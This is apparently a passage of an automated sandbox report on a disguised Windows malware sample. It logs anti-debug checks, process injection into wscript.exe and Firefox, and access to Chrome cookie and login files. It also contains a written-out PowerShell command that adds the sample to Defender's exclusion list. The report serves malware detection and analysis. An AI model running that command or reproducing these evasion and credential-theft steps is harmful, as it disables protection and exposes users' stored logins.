                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D0A5B mov eax, dword ptr fs:[00000030h]4_2_010D0A5B
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D0A5B mov eax, dword ptr fs:[00000030h]4_2_010D0A5B
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C6A50 mov eax, dword ptr fs:[00000030h]4_2_010C6A50
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C6A50 mov eax, dword ptr fs:[00000030h]4_2_010C6A50
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C6A50 mov eax, dword ptr fs:[00000030h]4_2_010C6A50
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C6A50 mov eax, dword ptr fs:[00000030h]4_2_010C6A50
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C6A50 mov eax, dword ptr fs:[00000030h]4_2_010C6A50
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C6A50 mov eax, dword ptr fs:[00000030h]4_2_010C6A50
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C6A50 mov eax, dword ptr fs:[00000030h]4_2_010C6A50
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FCA6F mov eax, dword ptr fs:[00000030h]4_2_010FCA6F
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FCA6F mov eax, dword ptr fs:[00000030h]4_2_010FCA6F
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FCA6F mov eax, dword ptr fs:[00000030h]4_2_010FCA6F
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0113CA72 mov eax, dword ptr fs:[00000030h]4_2_0113CA72
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0113CA72 mov eax, dword ptr fs:[00000030h]4_2_0113CA72
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010CEA80 mov eax, dword ptr fs:[00000030h]4_2_010CEA80
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010CEA80 mov eax, dword ptr fs:[00000030h]4_2_010CEA80
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010CEA80 mov eax, dword ptr fs:[00000030h]4_2_010CEA80
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010CEA80 mov eax, dword ptr fs:[00000030h]4_2_010CEA80
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010CEA80 mov eax, dword ptr fs:[00000030h]4_2_010CEA80
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010CEA80 mov eax, dword ptr fs:[00000030h]4_2_010CEA80
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010CEA80 mov eax, dword ptr fs:[00000030h]4_2_010CEA80
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010CEA80 mov eax, dword ptr fs:[00000030h]4_2_010CEA80
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010CEA80 mov eax, dword ptr fs:[00000030h]4_2_010CEA80
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01194A80 mov eax, dword ptr fs:[00000030h]4_2_01194A80
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F8A90 mov edx, dword ptr fs:[00000030h]4_2_010F8A90
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C8AA0 mov eax, dword ptr fs:[00000030h]4_2_010C8AA0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C8AA0 mov eax, dword ptr fs:[00000030h]4_2_010C8AA0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01116AA4 mov eax, dword ptr fs:[00000030h]4_2_01116AA4
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C0AD0 mov eax, dword ptr fs:[00000030h]4_2_010C0AD0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01116ACC mov eax, dword ptr fs:[00000030h]4_2_01116ACC
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01116ACC mov eax, dword ptr fs:[00000030h]4_2_01116ACC
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01116ACC mov eax, dword ptr fs:[00000030h]4_2_01116ACC
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F4AD0 mov eax, dword ptr fs:[00000030h]4_2_010F4AD0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F4AD0 mov eax, dword ptr fs:[00000030h]4_2_010F4AD0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FAAEE mov eax, dword ptr fs:[00000030h]4_2_010FAAEE
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FAAEE mov eax, dword ptr fs:[00000030h]4_2_010FAAEE
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01178D10 mov eax, dword ptr fs:[00000030h]4_2_01178D10
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01178D10 mov eax, dword ptr fs:[00000030h]4_2_01178D10
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010DAD00 mov eax, dword ptr fs:[00000030h]4_2_010DAD00
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010DAD00 mov eax, dword ptr fs:[00000030h]4_2_010DAD00
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010DAD00 mov eax, dword ptr fs:[00000030h]4_2_010DAD00
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F4D1D mov eax, dword ptr fs:[00000030h]4_2_010F4D1D
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010B6D10 mov eax, dword ptr fs:[00000030h]4_2_010B6D10
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010B6D10 mov eax, dword ptr fs:[00000030h]4_2_010B6D10
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010B6D10 mov eax, dword ptr fs:[00000030h]4_2_010B6D10
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01148D20 mov eax, dword ptr fs:[00000030h]4_2_01148D20
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C8D59 mov eax, dword ptr fs:[00000030h]4_2_010C8D59
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C8D59 mov eax, dword ptr fs:[00000030h]4_2_010C8D59
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C8D59 mov eax, dword ptr fs:[00000030h]4_2_010C8D59
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C8D59 mov eax, dword ptr fs:[00000030h]4_2_010C8D59
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C8D59 mov eax, dword ptr fs:[00000030h]4_2_010C8D59
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C0D59 mov eax, dword ptr fs:[00000030h]4_2_010C0D59
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C0D59 mov eax, dword ptr fs:[00000030h]4_2_010C0D59
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C0D59 mov eax, dword ptr fs:[00000030h]4_2_010C0D59
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01158D6B mov eax, dword ptr fs:[00000030h]4_2_01158D6B
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F6DA0 mov eax, dword ptr fs:[00000030h]4_2_010F6DA0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010E8DBF mov eax, dword ptr fs:[00000030h]4_2_010E8DBF
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010E8DBF mov eax, dword ptr fs:[00000030h]4_2_010E8DBF
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01194DAD mov eax, dword ptr fs:[00000030h]4_2_01194DAD
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01188DAE mov eax, dword ptr fs:[00000030h]4_2_01188DAE
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01188DAE mov eax, dword ptr fs:[00000030h]4_2_01188DAE
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FCDB1 mov ecx, dword ptr fs:[00000030h]4_2_010FCDB1
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FCDB1 mov eax, dword ptr fs:[00000030h]4_2_010FCDB1
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FCDB1 mov eax, dword ptr fs:[00000030h]4_2_010FCDB1
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01144DD7 mov eax, dword ptr fs:[00000030h]4_2_01144DD7
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010EEDD3 mov eax, dword ptr fs:[00000030h]4_2_010EEDD3
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010BCDEA mov eax, dword ptr fs:[00000030h]4_2_010BCDEA
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01160DF0 mov eax, dword ptr fs:[00000030h]4_2_01160DF0
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\specification and drawing.exe Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\Desktop\specification and drawing.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\specification and drawing.exe"
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe NtResumeThread: Direct from: 0x773836AC
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe NtMapViewOfSection: Direct from: 0x77382D1C
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe NtWriteVirtualMemory: Direct from: 0x77382E3C
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe NtProtectVirtualMemory: Direct from: 0x77382F9C
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe NtSetInformationThread: Direct from: 0x773763F9
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe NtCreateMutant: Direct from: 0x773835CC
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe NtNotifyChangeKey: Direct from: 0x77383C2C
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe NtSetInformationProcess: Direct from: 0x77382C5C
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe NtCreateUserProcess: Direct from: 0x7738371C
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe NtQueryInformationProcess: Direct from: 0x77382C26
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe NtResumeThread: Direct from: 0x77382FBC
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe NtWriteVirtualMemory: Direct from: 0x7738490C
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe NtAllocateVirtualMemory: Direct from: 0x77383C9C
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe NtReadFile: Direct from: 0x77382ADC
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe NtAllocateVirtualMemory: Direct from: 0x77382BFC
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe NtDelayExecution: Direct from: 0x77382DDC
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe NtQuerySystemInformation: Direct from: 0x77382DFC
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe NtOpenSection: Direct from: 0x77382E0C
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe NtQueryVolumeInformationFile: Direct from: 0x77382F2C
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe NtQuerySystemInformation: Direct from: 0x773848CC
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe NtReadVirtualMemory: Direct from: 0x77382E8C
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe NtCreateKey: Direct from: 0x77382C6C
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe NtClose: Direct from: 0x77382B6C
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe NtAllocateVirtualMemory: Direct from: 0x773848EC
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe NtQueryAttributesFile: Direct from: 0x77382E6C
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe NtSetInformationThread: Direct from: 0x77382B4C
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe NtTerminateThread: Direct from: 0x77382FCC
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe NtQueryInformationToken: Direct from: 0x77382CAC
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe NtOpenKeyEx: Direct from: 0x77382B9C
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe NtAllocateVirtualMemory: Direct from: 0x77382BEC
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe NtDeviceIoControlFile: Direct from: 0x77382AEC
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe NtCreateFile: Direct from: 0x77382FEC
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe NtOpenFile: Direct from: 0x77382DCC
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe NtProtectVirtualMemory: Direct from: 0x77377B2E
                      Source: C:\Users\user\Desktop\specification and drawing.exe Memory written: C:\Users\user\Desktop\specification and drawing.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\specification and drawing.exe Section loaded: NULL target: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe protection: execute and read and write
                      Source: C:\Users\user\Desktop\specification and drawing.exe Section loaded: NULL target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\wscript.exe Section loaded: NULL target: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe protection: read write
                      Source: C:\Windows\SysWOW64\wscript.exe Section loaded: NULL target: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\wscript.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                      Source: C:\Windows\SysWOW64\wscript.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\wscript.exe Thread register set: target process: 4852
                      Source: C:\Windows\SysWOW64\wscript.exe Thread APC queued: target process: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                      Source: C:\Users\user\Desktop\specification and drawing.exe Process created: C:\Users\user\Desktop\specification and drawing.exe "C:\Users\user\Desktop\specification and drawing.exe"
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\SysWOW64\wscript.exe"
                      Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Source: LfvKCNKdvt.exe, 00000007.00000002.4586766630.0000000001AC0000.00000002.00000001.00040000.00000000.sdmp, LfvKCNKdvt.exe, 00000007.00000000.2312450683.0000000001AC1000.00000002.00000001.00040000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590510372.0000000000E61000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
                      Source: LfvKCNKdvt.exe, 00000007.00000002.4586766630.0000000001AC0000.00000002.00000001.00040000.00000000.sdmp, LfvKCNKdvt.exe, 00000007.00000000.2312450683.0000000001AC1000.00000002.00000001.00040000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590510372.0000000000E61000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: LfvKCNKdvt.exe, 00000007.00000002.4586766630.0000000001AC0000.00000002.00000001.00040000.00000000.sdmp, LfvKCNKdvt.exe, 00000007.00000000.2312450683.0000000001AC1000.00000002.00000001.00040000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590510372.0000000000E61000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                      Source: LfvKCNKdvt.exe, 00000007.00000002.4586766630.0000000001AC0000.00000002.00000001.00040000.00000000.sdmp, LfvKCNKdvt.exe, 00000007.00000000.2312450683.0000000001AC1000.00000002.00000001.00040000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590510372.0000000000E61000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\specification and drawing.exeQueries volume information: C:\Users\user\Desktop\specification and drawing.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information

                      Source: Yara matchFile source: 4.2.specification and drawing.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.specification and drawing.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.2400421345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.4581614710.0000000000750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.4592454426.0000000004B70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2401176438.0000000001030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.4590637504.0000000004660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.4590687371.00000000046B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.4589607610.0000000003BF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2402440519.0000000001E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0.2.specification and drawing.exe.56c0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.specification and drawing.exe.3de24c8.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.specification and drawing.exe.3de24c8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.specification and drawing.exe.56c0000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.specification and drawing.exe.2e3d4b0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2187012973.00000000056C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2179156189.0000000003DC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2178181816.0000000002E0F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
